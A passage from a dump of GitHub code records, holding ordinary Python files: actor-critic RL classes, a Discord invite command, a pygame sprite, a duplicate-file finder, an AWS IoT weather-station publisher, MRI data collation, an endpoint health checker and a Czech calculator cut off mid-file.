algorithm.\"\"\"\n\n\tdef _reward(self):\n\t\t\"\"\"Adds Kullback-Leibler regularization to the reward.\"\"\"\n\t\tkl_reg = self.environment.kl_regularization(\n\t\t\tself.past_state, self.action, self.action_probability)\n\t\treturn self.reward + kl_reg\n\n\nclass actor_critic(episodic_algorithm):\n\t\"\"\"Uses the value as a baseline and an estimate of future returns.\"\"\"\n\n\tdef __init__(self, parameters):\n\t\tsuper().__init__(parameters)\n\t\tself.values = parameters['values']\n\n\tdef _update(self):\n\t\t\"\"\"Updates the policy and value for the previous state.\"\"\"\n\t\tpast_value = self.values.forward(self.past_state)\n\t\tif not self.end:\n\t\t\tcurrent_value = self.values.forward(self.current_state)\n\t\telse:\n\t\t\tcurrent_value = 0\n\t\ttd_error = current_value + self._reward() - past_value\n\t\tself.values.step(self.past_state, td_error)\n\t\tself.policy.step(self.past_state, td_error, self.eligibility)\n\n\tdef _per_step(self):\n\t\t\"\"\"Overrides the _per_step method, to transition and update each step.\"\"\"\n\t\tself._transition()\n\t\tself._update()\n\n\nclass max_entropy_actor_critic(actor_critic):\n\t\"\"\"Adds entropy regularization to the actor-critic algorithm.\"\"\"\n\n\tdef __init__(self, parameters, entropy_scaling = 1):\n\t\tsuper().__init__(parameters)\n\t\tself.entropy_scaling = entropy_scaling\n\n\tdef _reward(self):\n\t\t\"\"\"Adds entropy regularization to the reward.\"\"\"\n\t\treturn self.reward - self.entropy_scaling * math.log(self.action_probability)\n\n\nclass kl_regularized_actor_critic(actor_critic):\n\t\"\"\"Adds Kullback-Leibler regularization to the actor-critic algorithm.\"\"\"\n\n\tdef _reward(self):\n\t\t\"\"\"Adds Kullback-Leibler regularization to the reward.\"\"\"\n\t\tkl_reg = self.environment.kl_regularization(\n\t\t\tself.past_state, self.action, self.action_probability)\n\t\treturn self.reward + kl_reg","repo_name":"JamieMair/rledts","sub_path":"tabular_excursions/source/algorithms.py","file_name":"algorithms.py","file_ext":"py","file_size_in_byte":9563,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} {"seq_id":"42346898174","text":"from somsiad import SomsiadMixin\nimport discord\nfrom discord.ext import commands\n\nfrom core import cooldown\n\n\nclass Invite(commands.Cog, 
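`actor_critic._update` centres on the one-step temporal-difference error, bootstrapping from the next state's value except on terminal steps. The same computation extracted for clarity (undiscounted, matching the class above):

```python
def td_error(reward, past_value, current_value, terminal):
    # delta = r + V(s') - V(s), with V(s') taken as 0 when the episode ended.
    bootstrap = 0.0 if terminal else current_value
    return reward + bootstrap - past_value

print(td_error(reward=1.0, past_value=0.5, current_value=0.25, terminal=False))  # 0.75
print(td_error(reward=1.0, past_value=0.5, current_value=0.25, terminal=True))   # 0.5
```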
SomsiadMixin):\n    @cooldown()\n    @commands.command(aliases=['zaproś', 'zapros'])\n    @commands.guild_only()\n    async def invite(self, ctx, *, argument=''):\n        is_user_permitted_to_invite = False\n        for channel in ctx.guild.channels:\n            if channel.permissions_for(ctx.author).create_instant_invite:\n                is_user_permitted_to_invite = True\n                break\n        if 'somsiad' in argument or ctx.me in ctx.message.mentions:\n            embed = self.bot.generate_embed(\n                '🏠',\n                'Zapraszam do Somsiad Labs – mojego domu',\n                'http://discord.gg/xRCpDs7',\n                url='http://discord.gg/xRCpDs7',\n            )\n        elif is_user_permitted_to_invite:\n            max_uses = 0\n            unique = False\n            for word in argument.split():\n                if 'now' in word.lower() or 'twórz' in word.lower() or 'tworz' in word.lower():\n                    unique = True\n                if 'jednoraz' in word.lower():\n                    max_uses = 1\n                else:\n                    try:\n                        max_uses = abs(int(word))\n                    except ValueError:\n                        pass\n            channel = None\n            if ctx.channel.permissions_for(ctx.me).create_instant_invite:\n                channel = ctx.channel\n            else:\n                for current_channel in ctx.guild.channels:\n                    if (\n                        current_channel.permissions_for(ctx.me).create_instant_invite\n                        and current_channel.permissions_for(ctx.author).create_instant_invite\n                        and not isinstance(current_channel, discord.CategoryChannel)\n                    ):\n                        channel = current_channel\n                        break\n            if channel is None:\n                embed = self.bot.generate_embed(\n                    '⚠️',\n                    'Nie utworzono zaproszenia, bo bot nie ma do tego uprawnień na żadnym kanale, '\n                    'na którym ty je masz',\n                )\n            else:\n                invite = await channel.create_invite(max_uses=max_uses, unique=unique, reason=str(ctx.author))\n                if max_uses == 0:\n                    max_uses_info = ' o nieskończonej liczbie użyć'\n                elif max_uses == 1:\n                    max_uses_info = ' jednorazowe'\n                else:\n                    max_uses_info = f' o {max_uses} użyciach'\n                embed = self.bot.generate_embed(\n                    '✅',\n                    f'Utworzono{max_uses_info if max_uses == 1 else \"\"} zaproszenie na kanał '\n                    f'{\"#\" if isinstance(channel, discord.TextChannel) else \"\"}{channel}'\n                    f'{max_uses_info if max_uses != 1 else \"\"}',\n                    invite.url,\n                    url=invite.url,\n                )\n        else:\n            embed = self.bot.generate_embed(\n                '⚠️', 'Nie utworzono zaproszenia, bo nie masz do tego uprawnień na żadnym kanale'\n            )\n        await self.bot.send(ctx, embed=embed)\n\n\nasync def setup(bot: commands.Bot):\n    await bot.add_cog(Invite(bot))\n","repo_name":"Twixes/somsiad","sub_path":"plugins/invite.py","file_name":"invite.py","file_ext":"py","file_size_in_byte":3348,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"37"} {"seq_id":"37083924024","text":"import pygame\nimport os\nfrom pygame.sprite import Sprite\n\n\nclass Alien(Sprite):\n    def __init__(self, ai_settings, screen, color):\n        super(Alien, self).__init__()\n        self.screen = screen\n        self.ai_settings = ai_settings\n        self.my_points = 0\n        self.images = self.init_alien(color)\n\n        self.index = 0\n        self.image = self.images[self.index]\n\n        self.rect = self.image.get_rect()\n        self.rect.x = self.rect.width\n        self.rect.y = self.rect.height\n\n        self.height = self.rect\n        self.x = float(self.rect.x)\n\n        self.prep_explosion()\n\n    def init_alien(self, color):\n        images = []\n        path = 'images/Greenie/'\n        if color == \"green\":\n            path = 'images/Greenie/'\n            self.my_points = 10\n        elif color == \"yellow\":\n            path = 'images/Yellow Mellow/'\n            self.my_points = 10\n        elif color == \"purple\":\n            path = 'images/Purple/'\n            self.my_points = 10\n        elif color == \"blue\":\n            path = 'images/Blue/'\n            self.my_points = 10\n        elif color == \"green_boss\":\n            path = 'images/Green/'\n            self.my_points = 40\n        elif color == \"aqua\":\n            path = 
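The command above scans `ctx.guild.channels` for the first channel where both the bot and the invoking user hold `create_instant_invite`, skipping categories (which cannot hold invites). That scan condensed into a helper; `first_invitable_channel` is an illustrative name, not part of the cog:

```python
import discord

def first_invitable_channel(guild: discord.Guild,
                            me: discord.Member,
                            author: discord.Member):
    """Return the first non-category channel both members may invite to."""
    for channel in guild.channels:
        if isinstance(channel, discord.CategoryChannel):
            continue  # categories cannot hold invites
        if (channel.permissions_for(me).create_instant_invite
                and channel.permissions_for(author).create_instant_invite):
            return channel
    return None  # caller falls back to the "no permissions anywhere" embed
```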
'images/Aqua/'\n            self.my_points = 20\n\n        for file_name in os.listdir(path):\n            alien = pygame.image.load(path + os.sep + file_name)\n            images.append(alien)\n        return images\n\n    def blitme(self):\n        self.screen.blit(self.image, self.rect)\n\n    def check_edges(self):\n        screen_rect = self.screen.get_rect()\n        if self.rect.right >= screen_rect.right:\n            return True\n        elif self.rect.left <= 0:\n            return True\n\n    def prep_explosion(self):\n        self.explosion = []\n        self.prev_y = self.rect.bottom\n        self.prev_x = self.rect.centerx\n        self.exp_index = 0\n\n        path = 'images/alien explosion/'\n        for file_name in os.listdir(path):\n            alien = pygame.image.load(path + os.sep + file_name)\n            self.explosion.append(alien)\n\n    def alien_explosion(self):\n        self.image = self.explosion[self.exp_index]\n        self.rect = self.image.get_rect()\n        self.rect.centerx = self.prev_x\n        self.rect.bottom = self.prev_y\n\n    def update_explosion(self):\n        if self.exp_index < len(self.explosion):\n            self.alien_explosion()\n            self.exp_index += 1\n        elif self.exp_index >= len(self.explosion):\n            self.ai_settings.alien_explosion = False\n\n    def update(self):\n        self.index += 1\n\n        if self.index >= len(self.images):\n            self.index = 0\n        self.image = self.images[self.index]\n        self.x += (self.ai_settings.alien_speed_factor * self.ai_settings.fleet_direction)\n        self.rect.x = self.x\n","repo_name":"Diana-Joya/Aliens","sub_path":"alien.py","file_name":"alien.py","file_ext":"py","file_size_in_byte":2817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} {"seq_id":"70091208427","text":"# EGE CAN KAYA\r\n# 2018400018\r\n\r\nimport argparse\r\nimport os\r\nimport hashlib\r\nfrom collections import defaultdict\r\n\r\n# define a class that will hold the name, path and size of a file\r\nclass File:\r\n    def __init__(self, name, path, size):\r\n        self.name = name\r\n        self.path = path\r\n        self.size = size\r\n\r\n\r\n# define a class that will hold the name and path of a file and also calculate its size\r\n# (sum of the sizes of its files and subdirectories)\r\nclass Directory:\r\n    size = 0\r\n\r\n    # calculates the size of a directory, making use of os.walk (os.walk already\r\n    # descends into subdirectories, so recursing on them again would double count)\r\n    def directory_size(self, fullpath):\r\n        totalsize = 0\r\n        for root, dirs, files in os.walk(fullpath):\r\n            for f in files:\r\n                f_fullpath = os.path.join(root, f)\r\n                totalsize += os.stat(f_fullpath).st_size\r\n        return totalsize\r\n\r\n    def __init__(self, name, path):\r\n        self.name = name\r\n        self.path = path\r\n        self.size = self.directory_size(path) # calculate and save the size of the directory on instantiation\r\n\r\n# define a class that will hold the duplicate file text-blocks and the size of the\r\n# duplicate files (for the -s flag)\r\nclass Block:\r\n    def __init__(self, block, size):\r\n        self.block = block\r\n        self.size = size\r\n\r\n# use argparse to declare what kind of an input is acceptable\r\nap = argparse.ArgumentParser()\r\ngroup1 = ap.add_mutually_exclusive_group()\r\ngroup1.add_argument(\"-f\", action=\"store_true\")\r\ngroup1.add_argument(\"-d\", action=\"store_true\")\r\ngroup2 = ap.add_mutually_exclusive_group()\r\ngroup2.add_argument(\"-c\", action=\"store_true\")\r\ngroup2.add_argument(\"-n\", action=\"store_true\")\r\ngroup2.add_argument(\"-cn\", action=\"store_true\")\r\nap.add_argument(\"-s\", action=\"store_true\")\r\nap.add_argument(\"dirs\", nargs=\"*\")\r\n\r\n# parse the given commandline arguments and set the defaults if 
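Both frame loaders above iterate `os.listdir`, whose ordering is arbitrary, so animation frames can play out of sequence depending on the filesystem. A hedged sketch of a loader that pins the order with `sorted()` and joins paths portably:

```python
import os
import pygame

def load_frames(path):
    """Load animation frames in a deterministic (alphabetical) order."""
    frames = []
    for file_name in sorted(os.listdir(path)):  # listdir alone gives no guarantee
        frames.append(pygame.image.load(os.path.join(path, file_name)))
    return frames
```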
needed\r\nargs = ap.parse_args()\r\nif not args.f and not args.d:\r\n args.f = True\r\nif not args.c and not args.n and not args.cn:\r\n args.c = True\r\n\r\n# the directories given in the commandline\r\nd = args.dirs\r\n\r\n# containers for all the files and directories\r\nallfiles = []\r\nalldirs = []\r\n\r\n# if no directory is given, use the current working directory\r\nif not d:\r\n d.append(os.getcwd())\r\n\r\n# turn all possible relative paths into absolute paths\r\nfor i in range(len(d)):\r\n if not os.path.isabs(d[i]):\r\n d[i] = os.path.abspath(d[i])\r\n\r\n# get all of the files and subdirectories in the given directories, create according File\r\n# and Directory objects from them and place those objects in their respective containers\r\nfor entry in d:\r\n for root, dirs, files in os.walk(entry):\r\n for x in dirs:\r\n fullpath = os.path.join(root, x)\r\n newdir = Directory(x, fullpath)\r\n alldirs.append(newdir)\r\n for f in files:\r\n fullpath = os.path.join(root, f)\r\n allfiles.append(File(f, fullpath, os.stat(fullpath).st_size))\r\n\r\n# a dictionary where the keys are sha256 hashes and the values are File or Directory objects\r\nhashed_elems = defaultdict(list)\r\n\r\n# if -f flag is present\r\nif args.f:\r\n # for each file, read the contents, hash it using sha256 and map it to the dictionary\r\n if args.c:\r\n for curfile in allfiles:\r\n with open(curfile.path, \"rb\") as readfile:\r\n byts = readfile.read()\r\n hsh = hashlib.sha256(byts).hexdigest()\r\n hashed_elems[hsh].append(curfile)\r\n # for each file, hash the name of the file using sha256 and map it to the dictionary\r\n elif args.n:\r\n for curfile in allfiles:\r\n hashed_elems[curfile.name].append(curfile)\r\n # for each file, read the contents, add the name of the file to the end of the contents, then hash it \r\n # and map it to the dictionary\r\n elif args.cn:\r\n for curfile in allfiles:\r\n with open(curfile.path, \"rb\") as readfile:\r\n byts = readfile.read() + curfile.name.encode(\"utf-8\")\r\n hsh = hashlib.sha256(byts).hexdigest()\r\n hashed_elems[hsh].append(curfile)\r\n\r\n# a function which will get a hash for a given directory\r\ndef hash_directory(direc_path):\r\n # if the directory is empty, it gets the hash for the empty string\r\n if not os.listdir(direc_path):\r\n return hashlib.sha256(\"\".encode(\"utf-8\")).hexdigest()\r\n # container which will hold the hashes of all the files and subdirectories\r\n sub_hashes = []\r\n # relative paths of the contents of the directory\r\n subs = os.listdir(direc_path)\r\n # full paths of the contents of the directory, fill it using the path of the root\r\n subs_full = [\"\"] * len(subs)\r\n for i in range(len(subs)):\r\n subs_full[i] = os.path.join(direc_path, subs[i])\r\n # for each element, hash the contents and the name and add it to the sub_hashes list\r\n for i in range(len(subs_full)):\r\n # if the current element is a file, hash it as if -f -cn flags are given\r\n if os.path.isfile(subs_full[i]):\r\n with open(subs_full[i], \"rb\") as readfile:\r\n byts = readfile.read()\r\n hsh = hashlib.sha256(byts).hexdigest()\r\n sub_hashes.append(hsh)\r\n # if the current element is a directory, call the hash_directory function to hash it\r\n if os.path.isdir(subs_full[i]):\r\n sub_hashes.append(hash_directory(subs_full[i]))\r\n # sort the sub_hashes list alphabetically, turn it into a string, then hash it to get the \r\n # directory's hash\r\n sub_hashes.sort()\r\n string = \"\"\r\n for h in sub_hashes:\r\n string += h\r\n return 
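The `-f -c` mode above hashes each file by reading it whole with one `read()`. An alternative sketch that streams the file through SHA-256 in fixed-size chunks, giving the same digest with constant memory on large files; `sha256_file` is an illustrative name:

```python
import hashlib

def sha256_file(path, chunk_size=65536):
    """Digest a file incrementally instead of loading it into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):  # b"" signals EOF
            h.update(chunk)
    return h.hexdigest()
```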
hashlib.sha256(string.encode(\"utf-8\")).hexdigest()\r\n\r\n# if -d flag is present\r\nif args.d:\r\n if args.c:\r\n # hash the directories using the hash_directory function and map them to the dictionary\r\n for curdir in alldirs:\r\n hsh = hash_directory(curdir.path)\r\n hashed_elems[hsh].append(curdir)\r\n elif args.n:\r\n # hash the directories by their names and map them to the dictionary\r\n for curdir in alldirs:\r\n hsh0 = hash_directory(curdir.path)\r\n hsh1 = hashlib.sha256(curdir.name.encode(\"utf-8\")).hexdigest()\r\n string = hsh0 + hsh1\r\n hsh = hashlib.sha256(string.encode(\"utf-8\")).hexdigest()\r\n hashed_elems[hsh].append(curdir)\r\n elif args.cn:\r\n for curdir in alldirs:\r\n # hash the directories by hash_directory, then concatenate the name of the directory to\r\n # the end of the first hash, then take another hash. finally, map them to the dictionary\r\n hsha = hash_directory(curdir.path)\r\n hsh1 = hashlib.sha256(curdir.name.encode(\"utf-8\")).hexdigest()\r\n string = hsha + hsh1\r\n hshb = hashlib.sha256(string.encode(\"utf-8\")).hexdigest()\r\n hsh = hashlib.sha256((hsha + hshb).encode()).hexdigest()\r\n hashed_elems[hsh].append(curdir)\r\n\r\n# printer portion of the code. check all hashed elements and see if there are some\r\n# who are mapped to the same hash keys, meaning duplicate files/directories\r\nblocks = []\r\nfor k, v in hashed_elems.items():\r\n # same hash for multiple files/directories\r\n if len(v) > 1:\r\n v.sort(key = lambda x: x.path)\r\n block = \"\"\r\n lastsize = -1\r\n for f in v:\r\n # if -s flag is present and -n flag is not, need to print \\t and size of the file/directory\r\n if args.s and not args.n:\r\n block += f.path + \"\\t\" + \"%d\" % f.size + \"\\n\"\r\n else:\r\n block += f.path + \"\\n\"\r\n lastsize = f.size\r\n # put all of the text blocks in a list of blocks\r\n blocks.append(Block(block, lastsize))\r\n# if -s is present, sort the blocks by size\r\nif args.s and not args.n:\r\n blocks.sort(key = lambda x: x.size, reverse = True)\r\n# otherwise, sort them alphabetically\r\nelse: \r\n blocks.sort(key = lambda x: x.block)\r\n# finally, print all of the blocks to the output stream\r\nfor ele in blocks:\r\n print(ele.block)","repo_name":"ege-kaya/duplicate-file-finder","sub_path":"identic.py","file_name":"identic.py","file_ext":"py","file_size_in_byte":8184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71975203626","text":"import Adafruit_DHT\nimport ssl\nimport sys\nimport paho.mqtt.client as mqtt\nimport time\n\nsensor = Adafruit_DHT.DHT22\npin = 21 # GPIO 21\ndelaySecondsBetweenPublish = 1\n\nmqttCert_Protocol = ssl.PROTOCOL_TLSv1_2\nmqttTopic_pub = \"$aws/things/kayspi-weatherStation/shadow/update\"\nmqttTopic_sub = \"$aws/things/kayspi-weatherStation/shadow/update/rejected\"\nmqttCert_ca = \"./cert/VeriSign-Class-3-Public-Primary-Certification-Authority-G5.pem\"\nmqttCert = \"./cert/kayspi-weatherStation/de6f9196d1-certificate.pem.crt\"\nmqttCert_priv = \"./cert/kayspi-weatherStation/de6f9196d1-private.pem.key\"\nmqttClientId = \"kayspi-weatherStation\"\nmqttEndpoint = \"A1B71MLXKNXXXX.iot.us-east-1.amazonaws.com\"\nmqttPort = 8883\n\ndef on_connect(mqttc, obj, flags, rc):\n if rc == 0:\n print(\"Client conntected : \" + str(rc) + \" | Connection status: successful.\")\n mqttClient.subscribe(mqttTopic_sub, qos=0)\n publish_data()\n\ndef publish_data():\n #time.sleep(delaySecondsBetweenPublish)\n humidity, temperature = Adafruit_DHT.read_retry(sensor, pin)\n if 
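`hash_directory` sorts the child digests before concatenating and re-hashing, which makes a directory's hash independent of listing order. A toy check of that property using the same combination rule:

```python
import hashlib

def combine(child_hashes):
    # Sort, join, and re-hash, mirroring the end of hash_directory above.
    return hashlib.sha256("".join(sorted(child_hashes)).encode("utf-8")).hexdigest()

a = hashlib.sha256(b"file one").hexdigest()
b = hashlib.sha256(b"file two").hexdigest()
print(combine([a, b]) == combine([b, a]))  # True: sibling order does not matter
```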
humidity is not None and temperature is not None:\n payload = '{{\"state\":{{\"reported\":{{\"humidity\":{0:0.1f},\"temperature\":{1:0.1f}}}}}}}' \\\n .format(humidity,temperature)\n print(\"Publish {0}\".format(payload))\n mqttClient.publish(mqttTopic_pub, payload, 0, False)\n\ndef on_disconnect(client, userdata, rc):\n print(\"Client connection closed.\")\n\ndef on_log(pahoClient, obj, level, string):\n print(\"---------------\")\n print(string)\n\ndef on_publish(mosq, obj, mid):\n print(\"mid: \" + str(mid))\n publish_data()\n\ndef teardown():\n mqttClient.disconnect()\n mqttClient.loop_stop()\n sys.exit()\n\nmqttClient = mqtt.Client(client_id=mqttClientId)\nmqttClient.on_connect = on_connect\nmqttClient.on_disconnect = on_disconnect\nmqttClient.on_publish = on_publish\nmqttClient.on_log = on_log\n\nmqttClient.tls_set(mqttCert_ca, certfile=mqttCert, keyfile=mqttCert_priv, tls_version=mqttCert_Protocol, ciphers=None)\n\nprint(\"Start connecting to \" + mqttEndpoint + \":\" + str(mqttPort) + \" ...\")\n\ntry:\n mqttClient.connect(mqttEndpoint, port=mqttPort)\n mqttClient.loop_forever()\nexcept (KeyboardInterrupt, SystemExit):\n teardown()","repo_name":"KayLerch/alexa-hello-smarthome-skill","sub_path":"things/kayspi-weatherStation.py","file_name":"kayspi-weatherStation.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"33329805662","text":"\"\"\"\n\ntakes all the preprocessed files for a given domain and collates them into one numpy array file.\nThis way an entire dataset can be loaded into memory and retained, much less file IO during training.\n\n\"\"\"\nimport sys\n\nimport numpy as np\nsys.path.append(\"../../\")\nfrom twaidata.torchdatasets.whole_brain_dataset import MRISegmentationDatasetFromFile\nimport torch\nimport os\nfrom pathlib import Path\nfrom trustworthai.utils.augmentation.standard_transforms import NormalizeImg, PairedCompose, LabelSelect, PairedCentreCrop, CropZDim\nimport argparse\n\ndef construct_parser():\n # preprocessing settings\n parser = argparse.ArgumentParser(description = \"MRI nii.gz simple preprocessing pipeline\")\n \n parser.add_argument('-i', '--in_dir', required=True, help='Path of the stage 1 preprocessed data input folder')\n parser.add_argument('-o', '--out_dir', required=True, help='Path of the stage 2 preprocessed data output folder')\n parser.add_argument('-n', '--name', required=True, help='Name of dataset to be processed')\n parser.add_argument('-d', '--domain', required=False, default=None, help=\"Subdomain of the dataset to be processed. If None, will search for data directly in in_dir/dataset_name\")\n parser.add_argument('-H', '--crop_height', required=True, default=224, type=int, help=\"height of the centre crop of the image\")\n parser.add_argument('-W', '--crop_width', required=True, default=160, type=int, help=\"width of the centre crop of the image\")\n parser.add_argument('-l', '--label_extract', required=False, default=None, type=int, help=\"specfic id in the label map to extract (e.g 1 is WMH, 2 is other pathology in the WMH challenge dataset. if set, only the given label will be extracted, otherwise the label will be left as is). 
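`publish_data` above assembles the shadow document with a doubled-brace format string, which is easy to get wrong. A sketch of the same payload built with `json.dumps`; `round(..., 1)` stands in for the `{0:0.1f}` formatting:

```python
import json

def shadow_payload(humidity, temperature):
    """Build the AWS IoT shadow update document for the reported state."""
    return json.dumps({
        "state": {
            "reported": {
                "humidity": round(humidity, 1),
                "temperature": round(temperature, 1),
            }
        }
    })

print(shadow_payload(48.26, 21.94))
# {"state": {"reported": {"humidity": 48.3, "temperature": 21.9}}}
```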
optional\")\n\n return parser\n\n\ndef main(args):\n # extract args\n in_dir = args.in_dir\n out_dir = args.out_dir\n name = args.name\n domain = args.domain\n crop_height = args.crop_height\n crop_width = args.crop_width\n label_extract = args.label_extract\n \n # check file paths are okay\n in_dir = os.path.join(in_dir, name)\n out_dir = os.path.join(out_dir, name)\n if domain != None:\n in_dir = os.path.join(in_dir, domain)\n out_dir = os.path.join(out_dir, domain)\n \n if not os.path.exists(in_dir):\n raise ValueError(f\"could not find folder: {in_dir}\")\n \n print(f\"processing dataset: {in_dir}\")\n \n if not os.path.exists(out_dir):\n try:\n Path(out_dir).mkdir(parents=True, exist_ok=True)\n except FileNotFoundError:\n print(f\"Warning: couldn't make output directory here: {out_dir}\")\n \n \n # select centre crop and optionaly label extract transform\n crop_size = (crop_height, crop_width)\n transforms = get_transforms(crop_size, label_extract)\n \n \n # load the dataset\n dataset = MRISegmentationDatasetFromFile(\n in_dir, \n img_filetypes=[\"FLAIR_BET_mask.nii.gz\", \"FLAIR.nii.gz\", \"T1.nii.gz\"], # brain mask, flair, T1.\n label_filetype=\"wmh.nii.gz\",\n transforms=transforms\n )\n\n # collect the images and labels in to a list\n data_imgs = []\n data_labels = []\n slices = [] # check for inconsistent slice sizes across a domain\n for (img, label) in dataset:\n data_imgs.append(img)\n data_labels.append(label)\n slices.append(img.shape[1])\n \n # where there is more than one slice size in the domain\n # take a centre crop of the sizes equal to the miniumum\n # number of slices found in the domain.\n # should not affect the WMH challenge data, only the ED inhouse data.\n slices = np.array(slices)\n uniques = np.unique(slices)\n if len(uniques) > 1:\n print(f\"unique slice sizes found in domain: {uniques}\")\n # for each image select the centre minimum slice\n centre_cut = np.min(slices)\n for i in range(len(data_imgs)):\n if centre_cut < data_imgs[i].shape[1]: # crop images larger than the biggest slice size.\n start = (data_imgs[i].shape[1] - centre_cut) // 2\n data_imgs[i] = data_imgs[i][:,start:start+centre_cut,:,:]\n data_labels[i] = data_labels[i][:,start:start+centre_cut,:,:]\n \n # convert to numpy arrays\n data_imgs = np.stack(data_imgs, axis=0)\n data_labels = np.stack(data_labels, axis=0)\n print(f\"dataset imgs shape: {data_imgs.shape}\") \n print(f\"dataset labels shape: {data_labels.shape}\") \n\n # save the files\n out_file_imgs = os.path.join(out_dir, \"imgs.npy\")\n out_file_labels = os.path.join(out_dir, \"labels.npy\")\n np.save(out_file_imgs, data_imgs)\n np.save(out_file_labels, data_labels)\n\n \ndef get_transforms(crop_size, label_extract):\n if label_extract == None:\n print(\"keeping all labels\")\n return PairedCentreCrop(crop_size)\n else:\n print(f\"extracting label {label_extract}\")\n transforms = PairedCompose([\n PairedCentreCrop(crop_size), # cut out the centre square\n LabelSelect(label_extract), # extract the desired label\n ])\n return transforms\n\nif __name__ == '__main__':\n parser = construct_parser()\n args = parser.parse_args()\n main(args)\n\n","repo_name":"JingyuSunUOE/WMH_Challenge","sub_path":"twaidata/FileCollation_preprep/preprocess_file_collation.py","file_name":"preprocess_file_collation.py","file_ext":"py","file_size_in_byte":5276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71376839147","text":"import yaml\nimport requests\nimport time\n\ndef 
check_health(endpoints):\n availability = {}\n\n for endpoint in endpoints:\n name = endpoint['name']\n url = endpoint['url']\n availability[name] = {'up_count': 0, 'total_count': 0}\n\n while True:\n for endpoint in endpoints:\n name = endpoint['name']\n url = endpoint['url']\n method = endpoint.get('method', 'GET')\n headers = endpoint.get('headers', {})\n body = endpoint.get('body')\n\n start_time = time.time()\n response = requests.request(method, url, headers=headers, json=body)\n end_time = time.time()\n\n response_time = (end_time - start_time) * 1000 # Convert to milliseconds\n\n if response.ok and response_time < 500:\n availability[name]['up_count'] += 1\n\n availability[name]['total_count'] += 1\n\n print_availability(availability)\n time.sleep(15)\n\ndef print_availability(availability):\n for name, stats in availability.items():\n percentage = (stats['up_count'] / stats['total_count']) * 100\n print(f\"{name} has {percentage}% availability percentage\")\n\nif __name__ == \"__main__\":\n file_path = input(\"Enter the path to the YAML file: \")\n\n with open(file_path, 'r') as f:\n endpoints = yaml.safe_load(f)\n\n check_health(endpoints)\n\n","repo_name":"madhavisringarapu/Fetch-Test","sub_path":"availability.py","file_name":"availability.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1652933189","text":"#!/usr/bin/env python3\n\n# print(\"Kalkulačka1\\n\")\n# první_číslo = int(input(\"Zadejte první číslo: \"))\n# druhé_číslo = int(input(\"Zadejte druhé číslo: \"))\n# print(\"Jejich součet je:\", první_číslo + druhé_číslo)\n# print(\"Jejich rozdíl je:\", první_číslo - druhé_číslo)\n# print(\"Jejich součin je:\", první_číslo * druhé_číslo)\n# print(\"Jejich podíl je:\", první_číslo / druhé_číslo)\n# input(\"\\nStiskněte libovolnou klávesu...\")\n\n\n# print(\"Kalkulačka2\\n\")\n# prvni_cislo = int(input(\"Zadejte první číslo: \"))\n# druhe_cislo = int(input(\"Zadejte druhé číslo: \"))\n# print(\"1 - sčítání\")\n# print(\"2 - odčítání\")\n# print(\"3 - násobení\")\n# print(\"4 - dělení\")\n# cislo_operace = int(input(\"Zadejte číslo operace: \"))\n# if cislo_operace == 1:\n# print(\"Jejich součet je:\", prvni_cislo + druhe_cislo)\n# elif cislo_operace == 2:\n# print(\"Jejich rozdíl je:\", prvni_cislo - druhe_cislo)\n# elif cislo_operace == 3:\n# print(\"Jejich součin je:\", prvni_cislo * druhe_cislo)\n# elif cislo_operace == 4:\n# print(\"Jejich podíl je:\", prvni_cislo / druhe_cislo)\n# else:\n# print(\"Neplatná volba!\")\n# input(\"\\nStiskněte libovolnou klávesu...\")\n\n\nprint(\"Kalkulačka3\\n\")\npokracovat = True\nwhile pokracovat:\n prvni_cislo = int(input(\"Zadejte první číslo: \"))\n druhe_cislo = int(input(\"Zadejte druhé číslo: \"))\n print(\"1 - sčítání\")\n print(\"2 - odčítání\")\n print(\"3 - násobení\")\n print(\"4 - dělení\")\n print(\"5 - umocňování\")\n cislo_operace = int(input(\"Zadejte číslo operace: \"))\n if cislo_operace == 1:\n print(\"Jejich součet je:\", prvni_cislo + druhe_cislo)\n elif cislo_operace == 2:\n print(\"Jejich rozdíl je:\", prvni_cislo - druhe_cislo)\n elif cislo_operace == 3:\n print(\"Jejich součin je:\", prvni_cislo * druhe_cislo)\n elif cislo_operace == 4:\n print(\"Jejich podíl je:\", prvni_cislo / druhe_cislo)\n elif cislo_operace == 5:\n print(prvni_cislo, \"na\", druhe_cislo, \"je:\", prvni_cislo ** druhe_cislo)\n else:\n print(\"Neplatná volba!\")\n nezadano = True\n while nezadano:\n odpoved = input(\"\\nPřejete si zadat 
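`check_health` measures latency with wall-clock timestamps around the call. A sketch of an alternative using `requests`' built-in `response.elapsed`, which spans sending the request to parsing the response headers; `timed_request` is an illustrative name:

```python
import requests

def timed_request(method, url, **kwargs):
    """Return (is_up, latency_ms) for one endpoint check."""
    response = requests.request(method, url, timeout=5, **kwargs)
    latency_ms = response.elapsed.total_seconds() * 1000
    return response.ok and latency_ms < 500, latency_ms
```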
